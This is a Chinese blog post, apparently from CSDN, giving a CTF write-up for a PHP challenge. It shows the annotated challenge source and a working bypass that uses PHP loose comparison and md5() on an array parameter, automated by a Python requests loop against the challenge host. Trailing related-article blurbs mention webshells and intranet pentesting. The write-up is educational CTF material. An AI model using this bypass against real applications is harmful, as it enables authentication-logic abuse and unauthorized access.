10.27-这个真的是爆破

最新推荐文章于 2025-04-05 13:02:43 发布
最新推荐文章于 2025-04-05 13:02:43 发布
阅读量413 收藏
点赞数
分类专栏: CTF_1天1道
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43460822/article/details/102772852
版权

在这里插入图片描述
题目内容:

<?php 
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
  $_SESSION['nums'] = 0;
  $_SESSION['time'] = time();
  $_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){
  session_destroy();
}

$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $str_rands;
}

if($_SESSION['nums']>=10){
  echo $flag;
}

show_source(__FILE__);
?>

带有注释的题目

error_reporting(0);// 关闭错误报告
session_start();//启动会话
require('./flag.php');
if(!isset($_SESSION['nums'])){//isset() — 检测变量是否设置。
  $_SESSION['nums'] = 0;
  $_SESSION['time'] = time();//返回当前时间的 Unix 时间戳
  $_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){
  session_destroy();//session_destroy — 销毁一个会话中的全部数据
}//120s后会话结束

$value = $_REQUEST['value'];
$str_rand = range('a', 'z');//range创建一个包含从 "a" 到 "z" 之间的元素范围的数组
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];//mt_rand() 使用 Mersenne Twister 算法返回0到25之间的随机整数。$str_rand[mt_rand(0,25)]返回"a" 到 "z"之间任意字母。$str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)]是两任意字母相连

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){//substr(string,start,length)。===是包括变量值与类型完全相等。==只是比较两个数的值是否相等,由于substr是字符串,和数字比较的时候会强制转化成数字0,自然和0相等。
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $str_rands;
}

if($_SESSION['nums']>=10){//循环10次输出flag,暴力破解
  echo $flag;
}

show_source(__FILE__);
?>

代码内容:先设置初始值nums=0,time是当前时间,whoami=ea。当whoami=value时,num+1,whoami=$str_rands,循环。nums>=10时,打印flag。120s后会话结束,由于时间120秒,完全可以手工做10次,即可得到flag。
这道题可以手动也可以用python脚本来解
1、手动
由于==是弱类型判断,所以可以用数组绕过,即md5(数组)==0
因此首先构造?value[]=ea
在这里插入图片描述
再用rl替换ea,一共10次重复,即可得到flag
在这里插入图片描述
2、python脚本

import requests

url='http://9882efffe3b44ac39f6c9c1bfd7a4f219461f3fe32dc48d4.changame.ichunqiu.com/?value[]='

a=requests.session() //保存cookie信息
b=a.get(url+'ea') //发送get方式请求

for i in range(11):
	c=a.get(url+b.text[:2])
	b=c
	print(b.text)
	pass

直接看最后就行,就可以得到flag
在这里插入图片描述
参考文章:
https://blog.youkuaiyun.com/dragon_18/article/details/83446483
https://www.jianshu.com/p/67c7c89543f2
https://www.ichunqiu.com/writeup/detail/1069

红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 1151
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
渗透测试02
m0_63715896的博客
12-26 840
目录 渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 如果想跟我一起讨论,那快加入我的知识星球吧!   渗透测试 渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵! 渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布
Burp-Timestamp-Editor:提供弹出菜单以在Burp消息编辑器中编辑Unix时间戳
03-18
提供一个GUI,以在Burp消息编辑器中查看和编辑Unix时间戳。 选择时间戳,然后右键单击并选择“编辑时间戳”或“查看时间戳”。它可以处理以秒,毫秒和微秒为单位的时间戳(尽管UI会将其还原为0毫秒/微秒)。 “编辑时间戳”菜单仅在可编辑对象上可用,并且如果无法将所选值解析为时间戳,则该菜单将被禁用。如果可以解析,则菜单项上还会显示一个工具提示,以显示日期,以进行快速转换。 如果可以将所选值解析为时间戳,则“查看时间戳”菜单可用于其他对象(例如,代理历史记录)。同样,如果可以解析,则有一个工具提示。 上下文菜单 日期选择器 工具提示 观看者 此扩展使用库。
CTF-Web-这个真的爆破
qq_41459661的博客
03-04 388
这个真的爆破 源码分析 <?php error_reporting(0); session_start(); require('./flag.php'); // 初始化$_SESSION['nums']、$_SESSION['time']、$_SESSION['whoami'],isset函数是检测变量是否设置 if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SES
(小白教程)时间戳解读
最新发布
weixin_75168674的博客
04-05 347
问题说明时间戳加密是什么?利用时间+密钥做哈希的一种校验方式能解密吗?哈希不可逆,但你可以爆破怎么爆破?穷举时间戳(范围小),和密钥组合,逐个尝试如果是 base64 呢?直接解码即可。
python时间戳反爬详解(包含案例)——bolg4
m0_66653437的博客
04-06 2904
由于“==”结尾,多半是由于长度问题而使用“=”进行了填充,我们大概能猜到应该是使用了base64加密(因为base64对加密前字符长度是有要求的),如下:。需要注意的是,'=='结尾并不是base64编码的必要条件,取决于编码前数据的长度和是否需要填充。时间戳与数据拼接:将时间戳与需要加密的数据按照一定的规则拼接在一起,然后进行加密。常见的时间戳加密思路有以下几种:。确保数据的完整性:时间戳加密可以用于验证数据的完整性,通过将数据与时间戳结合进行加密,可以确保数据在传输过程中没有被篡改或被修改。
CTFshou wed命令执行29~50
qq_63676207的博客
09-20 1712
ctfshou wed入门
kali linux 支持什么编程语言_渗透过程中可能要用到的Kali工具小总结
weixin_39576066的博客
10-24 3000
渗透过程中可能要用到的Kali工具小总结写在最前面最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的所以写一个渗透过程中可能用到的kali渗透工具的小小总结写的不对 多多包涵 各位大佬轻喷 :DKali用得好 牢饭准管饱渗透不规范 亲人两行泪先来了解一下Kali(From Wikipdeia)Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Of...
ctf+管理员登录+php,一道有意思的CTF题目
weixin_28224217的博客
03-20 2433
前言近期在整理题目的时候,发现了一道质量不错的Web题,出自2019 TMCTF Final,特此记录一下。信息搜集题目描述:Hack the following server.http://10.0.106.(team number)/User NamePasswordguestpasswordadmin(Unknown)Note: You do not have to use way of b...
ctfshow web入门 命令执行
Blazing-Angel的博客
07-19 1576
ctfshow
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 6420
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
ctfshow web入门 序列化
Lumos427的博客
02-25 1622
序列化和反序列化 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-&gt
CTF-PHP审计
qq_53142368的博客
06-07 1054
来一篇刷题的文章: PHP原生类 源码 <?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1
i春秋-web-爆破3
Sea_Sand息禅
01-16 615
首先,是PHP代码审计,看懂就能解出来题。 &lt;?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'...
php(四)爆破
tutu123456789101112的博客
03-05 911
&lt;?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'ea'; } if($_SESSIO...
“百度杯”CTF比赛 2017 二月场 爆破-3
weixin_30267697的博客
03-26 184
进入题目,题目源码: <?phperror_reporting(0);session_start();require('./flag.php');if(!isset($_SESSION['nums'])){$_SESSION['nums']=0;$_SESSION['time']=time();$_SESSION['whoami']='ea';}if($_SESS...
php包含大马执行,对于某个PHP大马的分析
weixin_40008135的博客
03-09 235
阅读: 87 但是代码量却非常少: 不由得非常好奇它是如何用这么少的代码实现这么丰富的功能的。于是将它的 html 内容打印一下: 发现它的内容是gz压缩后再base64加密的: 于是反向执行一下,得到原始内容:error_reporting(0);session_start();if (!isset($_SESSION["phpapi"])) {$c = '';$useragent = 'Mo...
冰蝎 连接木马到反弹shell拿到权限全过程
热门推荐
hackzkaq的博客
11-25 1万+
.冰蝎简介 什么是冰蝎 “冰蝎”是一个动态二进制加密网站管理客户端。 在实战中一代webshell管理工具“菜刀”的流量特征非常明显,很容易就被安全设备检测到。 基于流量加密的webshell变得越来越多,“冰蝎”在此应运而生。 一.冰蝎连接getshell方法 1.加入冰蝎特有的的PHP木马,(注意:使用一句话木马无法连接冰蝎),连接密码可以随意改动格式为md5 32为的前16为值 md5(admin)[0-16] <?php @errorreporting(0); session_start()
10.27.24.1这个v4地址的子网掩码是
03-14
我可以回答这个问题,但需要更多信息才能确定子网掩码。一个IPv4地址需要一个子网掩码才能确定其所在的子网。通常,子网掩码是一个32位的二进制数字,其中1表示网络部分,0表示主机部分。因此,需要知道这个IPv4地址...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值